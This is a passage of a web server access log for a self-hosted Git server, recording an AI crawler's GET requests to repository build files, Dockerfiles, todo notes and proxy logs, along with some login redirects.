+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:23:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 10010] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:23:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 70934] [Gzip 29.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:16:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17967] [Gzip 11.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:16:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 7439] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:16:23:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 14156] [Gzip 5.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:23:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 10231] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:23:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 7439] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:16:23:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 10233] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:16:23:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 1571] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:23:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 70931] [Gzip 29.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:16:23:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 45072] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:16:23:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 45072] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:16:23:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 14155] [Gzip 5.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:23:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 10231] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:23:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 1571] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/cmake_install.cmake" -[17/Feb/2026:16:23:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 15181] [Gzip 6.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:16:23:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2381] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:16:24:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 295] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:16:24:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 295] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:16:24:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 15179] [Gzip 6.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:16:24:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2381] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:16:24:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/update_status.py" [Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/update_status.py" -[17/Feb/2026:16:24:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/update_status.py" [Client 74.7.227.38] [Length 824] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/update_status.py" -[17/Feb/2026:16:24:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal" [Client 74.7.227.38] [Length 10748] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver" -[17/Feb/2026:16:24:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/Dockerfile" [Client 74.7.227.38] [Length 11053] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/Dockerfile" -[17/Feb/2026:16:24:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.2%2flocalpycs%2fstruct.pyc" [Client 74.7.227.38] [Length 23813] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" -[17/Feb/2026:16:24:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.1%2flocalpycs%2fstruct.pyc" [Client 74.7.227.38] [Length 23806] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" -[17/Feb/2026:16:24:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.3%2flocalpycs%2fstruct.pyc" [Client 74.7.227.38] [Length 23810] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" -[17/Feb/2026:16:24:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/index.html?display=rendered" [Client 74.7.227.38] [Length 10879] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/index.html" -[17/Feb/2026:16:24:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-next-todo.md?display=source" [Client 74.7.227.38] [Length 13234] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-next-todo.md" -[17/Feb/2026:16:24:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-next-todo.md?display=source" [Client 74.7.227.38] [Length 13231] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-next-todo.md" -[17/Feb/2026:16:24:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-next-todo.md?display=source" [Client 74.7.227.38] [Length 13231] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-next-todo.md" -[17/Feb/2026:16:24:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-next-todo.md?display=source" [Client 74.7.227.38] [Length 13232] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-next-todo.md" -[17/Feb/2026:16:24:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-next-todo.md?display=source" [Client 74.7.227.38] [Length 13231] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-next-todo.md" -[17/Feb/2026:16:24:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal" -[17/Feb/2026:16:24:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal" -[17/Feb/2026:16:24:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/Dockerfile" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/Dockerfile" -[17/Feb/2026:16:24:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/Dockerfile" -[17/Feb/2026:16:24:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal" -[17/Feb/2026:16:24:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal" -[17/Feb/2026:16:24:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_upload/main/OpcUaMinimal" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal" -[17/Feb/2026:16:24:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_upload/main/OpcUaMinimal" -[17/Feb/2026:16:24:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal" [Client 74.7.227.38] [Length 9791] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal" -[17/Feb/2026:16:24:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/Dockerfile" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/Dockerfile" -[17/Feb/2026:16:24:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/Dockerfile" -[17/Feb/2026:16:24:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/OpcUaMinimal.csproj" [Client 74.7.227.38] [Length 11716] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal" -[17/Feb/2026:16:24:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_error.log?display=rendered" [Client 74.7.227.38] [Length 10927] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_error.log" -[17/Feb/2026:16:24:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_error.log?display=source" [Client 74.7.227.38] [Length 28009] [Gzip 9.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_error.log" -[17/Feb/2026:16:24:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_access.log?display=rendered" [Client 74.7.227.38] [Length 10930] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_access.log" -[17/Feb/2026:16:24:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_error.log?display=rendered" [Client 74.7.227.38] [Length 10926] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_error.log" -[17/Feb/2026:16:24:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_error.log?display=source" [Client 74.7.227.38] [Length 14442] [Gzip 4.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_error.log" -[17/Feb/2026:16:24:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_error.log?display=rendered" [Client 74.7.227.38] [Length 10926] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_error.log" -[17/Feb/2026:16:24:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_error.log?display=source" [Client 74.7.227.38] [Length 19781] [Gzip 9.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_error.log" -[17/Feb/2026:16:24:18 +0000] - 200 200 - GET https 